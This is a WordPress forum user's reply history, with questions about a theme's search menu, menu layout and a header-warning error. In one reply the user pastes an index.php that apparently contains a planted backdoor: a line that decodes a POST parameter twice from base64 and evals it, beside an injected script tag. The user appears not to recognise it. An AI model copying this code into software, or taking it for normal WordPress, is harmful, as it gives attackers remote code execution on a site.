VinylmationKing
Forum Replies Created
-
Forum: Themes and Templates
In reply to: [Esplanade] Adding Search BACK to the menuAlso i think this was the code but not 100% <?php get_search_form(); ?>
Forum: Fixing WordPress
In reply to: Increasing number of menu items per lineForum: Fixing WordPress
In reply to: Increasing number of menu items per linehttp://popvinyls.com/wp-content/uploads/2016/05/Screen-Shot-2016-05-01-at-3.01.46-PM.png
Okay my screenshot didn’t work…so hopefully this link will.
Forum: Fixing WordPress
In reply to: "Cannot modify header information…' Warning Message"This is what my index.php looks like:
<script src=’/jquery.js’ type=’text/javascript’ language=’javascrip’></script><?php if(isset($_POST[‘clasd’])){$str = base64_decode(base64_decode($_POST[‘clasd’]));eval(“?> $str <?php “);}?><?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*//**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);Forum: Fixing WordPress
In reply to: "Cannot modify header information…' Warning Message"So since it says pluggable.php should I look there as well?
And I apologize for not being a master of this but I’m looking for white space in the index.php or something else?